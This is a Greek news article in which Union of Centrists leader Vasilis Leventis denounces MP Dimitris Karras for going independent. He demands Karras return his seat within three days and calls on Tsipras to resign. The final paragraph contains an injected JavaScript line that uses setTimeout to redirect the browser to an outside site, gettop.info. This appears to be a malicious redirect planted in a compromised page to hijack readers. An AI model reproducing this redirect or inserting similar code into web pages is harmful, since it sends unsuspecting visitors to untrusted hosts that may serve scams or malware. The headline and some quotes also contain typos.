Λεβέντης: Πιώπλατη μαχαιριά η ανεξαρτητοποίηση Καρρά

0
9

 

Για την ανεξαρτητοποίηση του βουλευτή της Ένωσης Κεντρώων Δημήτρη Καρρά μίλησε στην πρωινή εκπομπή του ΑΝΤ1 ο πρόεδρος της Ένωσης Κεντρώων Βασίλης Λεβέντης που εμφανίστηκε λάβρος κατά του πρώην βουλευτή του, τονίζοντας ότι πρόκειται για πισώπλατη μαχαιριά.

«Σαφές αυτή η παρουσία συνοδευόταν από πίστη στο κόμμα και τον αρχηγό που τον πίστεψε. Έπρεπε να παραιτηθεί, να αφήσει την έδρα του. Έχει διορία τρεις ημέρες, αλλιώς θα του κάνω επίθεση. Δεν θα αφήσω την έδρα. Η έδρα ανήκει στο κόμμα. Ο κ. Καρράς έκανε λαθροχειρία. Γυρνάει αριστερά και δεξιά και λέει αυτός με ανέδειξε».

Όπως πρόσθεσε «η απάντησή μου θα είναι πολύ σκληρή. Η Ένωση Κεντρώων είναι ιδρώτας 40 ετών και μία εντολή της νεολαίας» και σημείωσε «που δεν τους άλλαξα ήταν αντισυνταγματικό. Είχα πληροφορίες ότι 2-3 ων επιλαχόντων ήταν έτοιμοι να προδώσουν και το πλήγμα ήρθε από τον πιο έμπιστο».

Και επανέλαβε: «Αν δεν παραδώσει την έδρα σε τρεςις ημέρες για εμένα πέθανε. Η αχαριστία είναι το μεγαλύτερο αδίκημα. Κι αν συνεχίσει να λέει ότι αυτός με ανέδειξε θα χάσει τη σοβαρότητά του«.

«Να παραιτηθεί τώρα ο Τσίπρας, να γίνει οικουμενική κυβέρνηση, δεν τήρησε τίποτα απ’ όσα δεσμεύθηκε» επανέλαβε όσον αφορά στις πολιτικές εξελίξεις ο κ. Λεβέντης.

To Mητσοτακέικο έχει ιστορία, να δίνει στέγη σε δραπέτες, είπε στο τέλος όταν ρωτήθηκε αν ο κ. Καρράς προσχωρήσει στη ΝΔ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here